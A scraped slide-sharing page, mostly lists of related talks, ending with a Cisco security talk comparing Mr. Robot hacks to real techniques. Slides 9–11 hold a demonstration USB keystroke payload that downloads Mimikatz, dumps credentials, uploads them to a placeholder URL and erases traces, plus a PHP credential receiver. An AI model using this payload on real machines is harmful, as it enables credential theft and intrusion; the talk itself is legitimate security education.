The business case for SD WAN in the enterprise The business case for SD WAN in the enterprise
The business case for SD WAN in the enterprise
 
Cisco Umbrella как облачная платформа защиты от угроз
Cisco Umbrella как облачная платформа защиты от угрозCisco Umbrella как облачная платформа защиты от угроз
Cisco Umbrella как облачная платформа защиты от угроз
 
A.I. Exercise.
A.I. Exercise.A.I. Exercise.
A.I. Exercise.
 
SD WAN MPLS service disruption or enhancement
SD WAN MPLS service disruption or enhancementSD WAN MPLS service disruption or enhancement
SD WAN MPLS service disruption or enhancement
 
SDN and NFV в банковской сфере
SDN and NFV в банковской сфереSDN and NFV в банковской сфере
SDN and NFV в банковской сфере
 

Similar to Cisco Security Experts Explore Hacking Techniques in Mr. Robot and Hollywood

[Cisco Connect 2018 - Vietnam] Eric rennie sw cisco_connect
[Cisco Connect 2018 - Vietnam] Eric rennie  sw cisco_connect[Cisco Connect 2018 - Vietnam] Eric rennie  sw cisco_connect
[Cisco Connect 2018 - Vietnam] Eric rennie sw cisco_connectNur Shiqim Chok
 
Exploit Kit Cornucopia - Blackhat USA 2017
Exploit Kit Cornucopia - Blackhat USA 2017Exploit Kit Cornucopia - Blackhat USA 2017
Exploit Kit Cornucopia - Blackhat USA 2017Brad Antoniewicz
 
Continuous security: Bringing agility to the secure development lifecycle
Continuous security: Bringing agility to the secure development lifecycleContinuous security: Bringing agility to the secure development lifecycle
Continuous security: Bringing agility to the secure development lifecycleRogue Wave Software
 
Mfg workshop security
Mfg workshop   securityMfg workshop   security
Mfg workshop securityRobert Albach
 
CONFidence2015: Real World Threat Hunting - Martin Nystrom
CONFidence2015: Real World Threat Hunting - Martin NystromCONFidence2015: Real World Threat Hunting - Martin Nystrom
CONFidence2015: Real World Threat Hunting - Martin NystromPROIDEA
 
The Next Generation Security
The Next Generation SecurityThe Next Generation Security
The Next Generation SecurityCybera Inc.
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network SecurityHarish Chaudhary
 
Automating Security and Compliance Testing of Infrastructure-as-Code for DevS...
Automating Security and Compliance Testing of Infrastructure-as-Code for DevS...Automating Security and Compliance Testing of Infrastructure-as-Code for DevS...
Automating Security and Compliance Testing of Infrastructure-as-Code for DevS...Amazon Web Services
 
Defending the Endpoint with Next-Gen Security
Defending the Endpoint with Next-Gen SecurityDefending the Endpoint with Next-Gen Security
Defending the Endpoint with Next-Gen SecuritySophos Benelux
 
Cisco Connect 2018 Singapore - Cybersecurity strategy
Cisco Connect 2018 Singapore - Cybersecurity strategy  Cisco Connect 2018 Singapore - Cybersecurity strategy
Cisco Connect 2018 Singapore - Cybersecurity strategy NetworkCollaborators
 
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...Codemotion
 
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...Codemotion
 
Mobile Penetration Testing: Episode III - Attack of the Code
Mobile Penetration Testing: Episode III - Attack of the CodeMobile Penetration Testing: Episode III - Attack of the Code
Mobile Penetration Testing: Episode III - Attack of the CodeNowSecure
 
Next Generation Security
Next Generation SecurityNext Generation Security
Next Generation SecurityCisco Canada
 
Cisco Network Insider: Three Ways to Secure your Network
Cisco Network Insider: Three Ways to Secure your NetworkCisco Network Insider: Three Ways to Secure your Network
Cisco Network Insider: Three Ways to Secure your NetworkRobb Boyd
 
Rajarshi Gupta at AI Frontiers : Security is AI’s biggest challenge, AI is Se...
Rajarshi Gupta at AI Frontiers : Security is AI’s biggest challenge, AI is Se...Rajarshi Gupta at AI Frontiers : Security is AI’s biggest challenge, AI is Se...
Rajarshi Gupta at AI Frontiers : Security is AI’s biggest challenge, AI is Se...AI Frontiers
 
Securing your Cloud Environment v2
Securing your Cloud Environment v2Securing your Cloud Environment v2
Securing your Cloud Environment v2ShapeBlue
 
Targeted Threat (APT) Defense for Applications Featuring pxGrid: a deep dive
Targeted Threat (APT) Defense for Applications Featuring pxGrid: a deep diveTargeted Threat (APT) Defense for Applications Featuring pxGrid: a deep dive
Targeted Threat (APT) Defense for Applications Featuring pxGrid: a deep diveCisco DevNet
 
[CONFidence 2016] Gaweł Mikołajczyk - Making sense out of the Security Operat...
[CONFidence 2016] Gaweł Mikołajczyk - Making sense out of the Security Operat...[CONFidence 2016] Gaweł Mikołajczyk - Making sense out of the Security Operat...
[CONFidence 2016] Gaweł Mikołajczyk - Making sense out of the Security Operat...PROIDEA
 
Cisco Connect Ottawa 2018 data centre security
Cisco Connect Ottawa 2018 data centre securityCisco Connect Ottawa 2018 data centre security
Cisco Connect Ottawa 2018 data centre securityCisco Canada
 

Similar to Cisco Security Experts Explore Hacking Techniques in Mr. Robot and Hollywood (20)

[Cisco Connect 2018 - Vietnam] Eric rennie sw cisco_connect
[Cisco Connect 2018 - Vietnam] Eric rennie  sw cisco_connect[Cisco Connect 2018 - Vietnam] Eric rennie  sw cisco_connect
[Cisco Connect 2018 - Vietnam] Eric rennie sw cisco_connect
 
Exploit Kit Cornucopia - Blackhat USA 2017
Exploit Kit Cornucopia - Blackhat USA 2017Exploit Kit Cornucopia - Blackhat USA 2017
Exploit Kit Cornucopia - Blackhat USA 2017
 
Continuous security: Bringing agility to the secure development lifecycle
Continuous security: Bringing agility to the secure development lifecycleContinuous security: Bringing agility to the secure development lifecycle
Continuous security: Bringing agility to the secure development lifecycle
 
Mfg workshop security
Mfg workshop   securityMfg workshop   security
Mfg workshop security
 
CONFidence2015: Real World Threat Hunting - Martin Nystrom
CONFidence2015: Real World Threat Hunting - Martin NystromCONFidence2015: Real World Threat Hunting - Martin Nystrom
CONFidence2015: Real World Threat Hunting - Martin Nystrom
 
The Next Generation Security
The Next Generation SecurityThe Next Generation Security
The Next Generation Security
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security
 
Automating Security and Compliance Testing of Infrastructure-as-Code for DevS...
Automating Security and Compliance Testing of Infrastructure-as-Code for DevS...Automating Security and Compliance Testing of Infrastructure-as-Code for DevS...
Automating Security and Compliance Testing of Infrastructure-as-Code for DevS...
 
Defending the Endpoint with Next-Gen Security
Defending the Endpoint with Next-Gen SecurityDefending the Endpoint with Next-Gen Security
Defending the Endpoint with Next-Gen Security
 
Cisco Connect 2018 Singapore - Cybersecurity strategy
Cisco Connect 2018 Singapore - Cybersecurity strategy  Cisco Connect 2018 Singapore - Cybersecurity strategy
Cisco Connect 2018 Singapore - Cybersecurity strategy
 
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
 
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
 
Mobile Penetration Testing: Episode III - Attack of the Code
Mobile Penetration Testing: Episode III - Attack of the CodeMobile Penetration Testing: Episode III - Attack of the Code
Mobile Penetration Testing: Episode III - Attack of the Code
 
Next Generation Security
Next Generation SecurityNext Generation Security
Next Generation Security
 
Cisco Network Insider: Three Ways to Secure your Network
Cisco Network Insider: Three Ways to Secure your NetworkCisco Network Insider: Three Ways to Secure your Network
Cisco Network Insider: Three Ways to Secure your Network
 
Rajarshi Gupta at AI Frontiers : Security is AI’s biggest challenge, AI is Se...
Rajarshi Gupta at AI Frontiers : Security is AI’s biggest challenge, AI is Se...Rajarshi Gupta at AI Frontiers : Security is AI’s biggest challenge, AI is Se...
Rajarshi Gupta at AI Frontiers : Security is AI’s biggest challenge, AI is Se...
 
Securing your Cloud Environment v2
Securing your Cloud Environment v2Securing your Cloud Environment v2
Securing your Cloud Environment v2
 
Targeted Threat (APT) Defense for Applications Featuring pxGrid: a deep dive
Targeted Threat (APT) Defense for Applications Featuring pxGrid: a deep diveTargeted Threat (APT) Defense for Applications Featuring pxGrid: a deep dive
Targeted Threat (APT) Defense for Applications Featuring pxGrid: a deep dive
 
[CONFidence 2016] Gaweł Mikołajczyk - Making sense out of the Security Operat...
[CONFidence 2016] Gaweł Mikołajczyk - Making sense out of the Security Operat...[CONFidence 2016] Gaweł Mikołajczyk - Making sense out of the Security Operat...
[CONFidence 2016] Gaweł Mikołajczyk - Making sense out of the Security Operat...
 
Cisco Connect Ottawa 2018 data centre security
Cisco Connect Ottawa 2018 data centre securityCisco Connect Ottawa 2018 data centre security
Cisco Connect Ottawa 2018 data centre security
 

More from Cisco Canada

Cisco connect montreal 2018 net devops
Cisco connect montreal 2018 net devopsCisco connect montreal 2018 net devops
Cisco connect montreal 2018 net devopsCisco Canada
 
Cisco connect montreal 2018 iot demo kinetic fr
Cisco connect montreal 2018   iot demo kinetic frCisco connect montreal 2018   iot demo kinetic fr
Cisco connect montreal 2018 iot demo kinetic frCisco Canada
 
Cisco connect montreal 2018 - Network Slicing: Horizontal Virtualization
Cisco connect montreal 2018 - Network Slicing: Horizontal VirtualizationCisco connect montreal 2018 - Network Slicing: Horizontal Virtualization
Cisco connect montreal 2018 - Network Slicing: Horizontal VirtualizationCisco Canada
 
Cisco connect montreal 2018 secure dc
Cisco connect montreal 2018    secure dcCisco connect montreal 2018    secure dc
Cisco connect montreal 2018 secure dcCisco Canada
 
Cisco connect montreal 2018 enterprise networks - say goodbye to vla ns
Cisco connect montreal 2018   enterprise networks - say goodbye to vla nsCisco connect montreal 2018   enterprise networks - say goodbye to vla ns
Cisco connect montreal 2018 enterprise networks - say goodbye to vla nsCisco Canada
 
Cisco connect montreal 2018 vision mondiale analyse locale
Cisco connect montreal 2018 vision mondiale analyse localeCisco connect montreal 2018 vision mondiale analyse locale
Cisco connect montreal 2018 vision mondiale analyse localeCisco Canada
 
Cisco Connect Montreal 2018 Securité : Sécuriser votre mobilité avec Cisco
Cisco Connect Montreal 2018 Securité : Sécuriser votre mobilité avec CiscoCisco Connect Montreal 2018 Securité : Sécuriser votre mobilité avec Cisco
Cisco Connect Montreal 2018 Securité : Sécuriser votre mobilité avec CiscoCisco Canada
 
Cisco connect montreal 2018 collaboration les services webex hybrides
Cisco connect montreal 2018 collaboration les services webex hybridesCisco connect montreal 2018 collaboration les services webex hybrides
Cisco connect montreal 2018 collaboration les services webex hybridesCisco Canada
 
Integration cisco et microsoft connect montreal 2018
Integration cisco et microsoft connect montreal 2018Integration cisco et microsoft connect montreal 2018
Integration cisco et microsoft connect montreal 2018Cisco Canada
 
Cisco connect montreal 2018 compute v final
Cisco connect montreal 2018   compute v finalCisco connect montreal 2018   compute v final
Cisco connect montreal 2018 compute v finalCisco Canada
 
Cisco connect montreal 2018 saalvare md-program-xr-v2
Cisco connect montreal 2018 saalvare md-program-xr-v2Cisco connect montreal 2018 saalvare md-program-xr-v2
Cisco connect montreal 2018 saalvare md-program-xr-v2Cisco Canada
 
Cisco connect montreal 2018 sd wan - delivering intent-based networking to th...
Cisco connect montreal 2018 sd wan - delivering intent-based networking to th...Cisco connect montreal 2018 sd wan - delivering intent-based networking to th...
Cisco connect montreal 2018 sd wan - delivering intent-based networking to th...Cisco Canada
 
Cisco Connect Toronto 2018 DNA automation-the evolution to intent-based net...
Cisco Connect Toronto 2018   DNA automation-the evolution to intent-based net...Cisco Connect Toronto 2018   DNA automation-the evolution to intent-based net...
Cisco Connect Toronto 2018 DNA automation-the evolution to intent-based net...Cisco Canada
 
Cisco Connect Toronto 2018 an introduction to Cisco kinetic
Cisco Connect Toronto 2018   an introduction to Cisco kineticCisco Connect Toronto 2018   an introduction to Cisco kinetic
Cisco Connect Toronto 2018 an introduction to Cisco kineticCisco Canada
 
Cisco Connect Toronto 2018 IOT - unlock the power of data - securing the in...
Cisco Connect Toronto 2018   IOT - unlock the power of data - securing the in...Cisco Connect Toronto 2018   IOT - unlock the power of data - securing the in...
Cisco Connect Toronto 2018 IOT - unlock the power of data - securing the in...Cisco Canada
 
Cisco Connect Toronto 2018 DevNet Overview
Cisco Connect Toronto 2018  DevNet OverviewCisco Connect Toronto 2018  DevNet Overview
Cisco Connect Toronto 2018 DevNet OverviewCisco Canada
 
Cisco Connect Toronto 2018 DNA assurance
Cisco Connect Toronto 2018  DNA assuranceCisco Connect Toronto 2018  DNA assurance
Cisco Connect Toronto 2018 DNA assuranceCisco Canada
 
Cisco Connect Toronto 2018 network-slicing
Cisco Connect Toronto 2018   network-slicingCisco Connect Toronto 2018   network-slicing
Cisco Connect Toronto 2018 network-slicingCisco Canada
 
Cisco Connect Toronto 2018 the intelligent network with cisco meraki
Cisco Connect Toronto 2018   the intelligent network with cisco merakiCisco Connect Toronto 2018   the intelligent network with cisco meraki
Cisco Connect Toronto 2018 the intelligent network with cisco merakiCisco Canada
 
Cisco Connect Toronto 2018 sd-wan - delivering intent-based networking to t...
Cisco Connect Toronto 2018   sd-wan - delivering intent-based networking to t...Cisco Connect Toronto 2018   sd-wan - delivering intent-based networking to t...
Cisco Connect Toronto 2018 sd-wan - delivering intent-based networking to t...Cisco Canada
 

More from Cisco Canada (20)

Cisco connect montreal 2018 net devops
Cisco connect montreal 2018 net devopsCisco connect montreal 2018 net devops
Cisco connect montreal 2018 net devops
 
Cisco connect montreal 2018 iot demo kinetic fr
Cisco connect montreal 2018   iot demo kinetic frCisco connect montreal 2018   iot demo kinetic fr
Cisco connect montreal 2018 iot demo kinetic fr
 
Cisco connect montreal 2018 - Network Slicing: Horizontal Virtualization
Cisco connect montreal 2018 - Network Slicing: Horizontal VirtualizationCisco connect montreal 2018 - Network Slicing: Horizontal Virtualization
Cisco connect montreal 2018 - Network Slicing: Horizontal Virtualization
 
Cisco connect montreal 2018 secure dc
Cisco connect montreal 2018    secure dcCisco connect montreal 2018    secure dc
Cisco connect montreal 2018 secure dc
 
Cisco connect montreal 2018 enterprise networks - say goodbye to vla ns
Cisco connect montreal 2018   enterprise networks - say goodbye to vla nsCisco connect montreal 2018   enterprise networks - say goodbye to vla ns
Cisco connect montreal 2018 enterprise networks - say goodbye to vla ns
 
Cisco connect montreal 2018 vision mondiale analyse locale
Cisco connect montreal 2018 vision mondiale analyse localeCisco connect montreal 2018 vision mondiale analyse locale
Cisco connect montreal 2018 vision mondiale analyse locale
 
Cisco Connect Montreal 2018 Securité : Sécuriser votre mobilité avec Cisco
Cisco Connect Montreal 2018 Securité : Sécuriser votre mobilité avec CiscoCisco Connect Montreal 2018 Securité : Sécuriser votre mobilité avec Cisco
Cisco Connect Montreal 2018 Securité : Sécuriser votre mobilité avec Cisco
 
Cisco connect montreal 2018 collaboration les services webex hybrides
Cisco connect montreal 2018 collaboration les services webex hybridesCisco connect montreal 2018 collaboration les services webex hybrides
Cisco connect montreal 2018 collaboration les services webex hybrides
 
Integration cisco et microsoft connect montreal 2018
Integration cisco et microsoft connect montreal 2018Integration cisco et microsoft connect montreal 2018
Integration cisco et microsoft connect montreal 2018
 
Cisco connect montreal 2018 compute v final
Cisco connect montreal 2018   compute v finalCisco connect montreal 2018   compute v final
Cisco connect montreal 2018 compute v final
 
Cisco connect montreal 2018 saalvare md-program-xr-v2
Cisco connect montreal 2018 saalvare md-program-xr-v2Cisco connect montreal 2018 saalvare md-program-xr-v2
Cisco connect montreal 2018 saalvare md-program-xr-v2
 
Cisco connect montreal 2018 sd wan - delivering intent-based networking to th...
Cisco connect montreal 2018 sd wan - delivering intent-based networking to th...Cisco connect montreal 2018 sd wan - delivering intent-based networking to th...
Cisco connect montreal 2018 sd wan - delivering intent-based networking to th...
 
Cisco Connect Toronto 2018 DNA automation-the evolution to intent-based net...
Cisco Connect Toronto 2018   DNA automation-the evolution to intent-based net...Cisco Connect Toronto 2018   DNA automation-the evolution to intent-based net...
Cisco Connect Toronto 2018 DNA automation-the evolution to intent-based net...
 
Cisco Connect Toronto 2018 an introduction to Cisco kinetic
Cisco Connect Toronto 2018   an introduction to Cisco kineticCisco Connect Toronto 2018   an introduction to Cisco kinetic
Cisco Connect Toronto 2018 an introduction to Cisco kinetic
 
Cisco Connect Toronto 2018 IOT - unlock the power of data - securing the in...
Cisco Connect Toronto 2018   IOT - unlock the power of data - securing the in...Cisco Connect Toronto 2018   IOT - unlock the power of data - securing the in...
Cisco Connect Toronto 2018 IOT - unlock the power of data - securing the in...
 
Cisco Connect Toronto 2018 DevNet Overview
Cisco Connect Toronto 2018  DevNet OverviewCisco Connect Toronto 2018  DevNet Overview
Cisco Connect Toronto 2018 DevNet Overview
 
Cisco Connect Toronto 2018 DNA assurance
Cisco Connect Toronto 2018  DNA assuranceCisco Connect Toronto 2018  DNA assurance
Cisco Connect Toronto 2018 DNA assurance
 
Cisco Connect Toronto 2018 network-slicing
Cisco Connect Toronto 2018   network-slicingCisco Connect Toronto 2018   network-slicing
Cisco Connect Toronto 2018 network-slicing
 
Cisco Connect Toronto 2018 the intelligent network with cisco meraki
Cisco Connect Toronto 2018   the intelligent network with cisco merakiCisco Connect Toronto 2018   the intelligent network with cisco meraki
Cisco Connect Toronto 2018 the intelligent network with cisco meraki
 
Cisco Connect Toronto 2018 sd-wan - delivering intent-based networking to t...
Cisco Connect Toronto 2018   sd-wan - delivering intent-based networking to t...Cisco Connect Toronto 2018   sd-wan - delivering intent-based networking to t...
Cisco Connect Toronto 2018 sd-wan - delivering intent-based networking to t...
 

Recently uploaded

Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 

Recently uploaded (20)

Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 

Cisco Security Experts Explore Hacking Techniques in Mr. Robot and Hollywood

  • 1. Vince Kornacki, Senior Security Consultant, Cisco Sean Mason, Director of Incident Response, Cisco October 12, 2017 Exploring the Anatomy of a Cyber-Attack Security Through the Eyes of a Hacker
  • 2. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Hollywood’s Depiction of Hacking “I dropped a logic bomb through the trap door.” -Swordfish “A gigabyte of RAM should do the trick” -Under Siege 2 “I’ll create a GUI interface using Visual Basic, see if I can track an IP address.” -CSI “Isolate the node and dump it on the other side of the router.” -NCIS
  • 3. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential The award for Hollywood’s best attempt at depicting hacking goes to…
  • 4. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Elliot Hacks Steel Mountain Thermostat
  • 5. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential How’d He Do It? • Social Engineers his way inside the building • Splice Raspberry Pi into the BACnet (Building Automation and Control Network) network lines connected to the thermostat
  • 6. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential How’d He Do It?
  • 7. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Angela Hacks Her Boss’ Evil Corp Credentials
  • 8. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential How’d She Do It? Rubber Ducky USB • Keystroke injection attack tool Invoke-Mimikatz • Script that reflectively injects Mimikatz into memory using Powershell
  • 9. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Proof of Concept 1. Write the Payload • Open administrator command prompt DELAY 1000 GUI r STRING powershell Start-Process cmd –Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 • Obfuscate command prompt STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER
  • 10. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Proof of Concept 1. Write the Payload (continued) • Download and execute “Invoke-Mimikatz” script then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString(MimikatzScriptURL:’); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString(‘PHP_Creds_Receiver_URL’, $output)” ENTER DELAY 15000 • Clear the Run history and exit STRING powershell "Remove-ItemProperty -Path ’PathToRunMRU' -Name '*' -ErrorAction SilentlyContinue" ENTER STRING exit ENTER
  • 11. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Proof of Concept 2. Encode the Payload java -jar duckencode.jar -i invoke-mimikatz.txt -o inject.bin 3. Set up Web Server <?php $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input")); ?>
  • 12. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Proof of Concept 4. Deploy Attack
  • 13. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Elliot Hacks the Prison
  • 14. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Spoofing a Bluetooth Connection
  • 15. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential How’d He Do It? 1. Enable Bluetooth 2. Scan for Bluetooth Devices
